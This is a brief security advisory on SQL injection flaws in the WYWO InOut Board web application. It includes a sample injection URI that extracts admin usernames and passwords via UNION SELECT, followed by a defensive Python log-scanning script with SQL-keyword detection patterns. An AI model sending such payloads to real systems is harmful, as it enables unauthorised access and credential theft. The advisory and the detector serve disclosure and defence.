WYWO InOut Board Multiple SQL Injection Vulnerabilities

Attackers can exploit this issue via a web client.

The following sample URIs are available:

http://www.example.com/phonemessage.asp?num=-1%20union%20select%200,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20employee%20where%20Admin='Yes'
http://www.example.com/[path]//faqDsp.asp?catcode=[SQL]
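
A defender can flag requests of this shape in web server logs. The following is an added example, not part of the original advisory or the vendor's code: it checks the `num` and `catcode` parameters of the two pages named above. The function name, the allowed-value pattern and all sample requests other than the first are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Pages and parameters taken from the advisory's sample URIs (lower-cased).
WATCHED = {"phonemessage.asp": "num", "faqdsp.asp": "catcode"}

# Assumption: legitimate values are short identifiers with no spaces or quotes.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]{1,32}")
SQL_TOKENS = re.compile(r"\b(union|select|from|where)\b|--|;|'", re.IGNORECASE)


def inspect_request(uri):
    """Return a list of (param, decoded_value, reasons) for a suspicious request."""
    parts = urlsplit(uri)
    page = parts.path.rsplit("/", 1)[-1].lower()
    param = WATCHED.get(page)
    if param is None:
        return []
    # parse_qs percent-decodes once; ASP query-string keys are case-insensitive.
    query = {}
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        query.setdefault(key.lower(), []).extend(values)
    findings = []
    for value in query.get(param, []):
        reasons = []
        if not SAFE_VALUE.fullmatch(value):
            reasons.append("unexpected characters")
        if SQL_TOKENS.search(value):
            reasons.append("SQL keyword or metacharacter")
        if reasons:
            findings.append((param, value, reasons))
    return findings


# Constructed request URIs; only the first is the advisory's own sample.
SAMPLE_REQUESTS = [
    "http://www.example.com/phonemessage.asp?num=-1%20union%20select%200,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20employee%20where%20Admin='Yes'",
    "/phonemessage.asp?num=42",
    "/app//faqDsp.asp?CatCode=7%27",
    "/default.asp?num=1%20union%20select",
]

if __name__ == "__main__":
    for uri in SAMPLE_REQUESTS:
        for param, value, reasons in inspect_request(uri):
            print(f"ALERT {param}={value!r}: {', '.join(reasons)}")
```

Pages outside the watch list are ignored by design, so the last constructed request produces no alert.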


 

Copyright 2010, SecurityFocus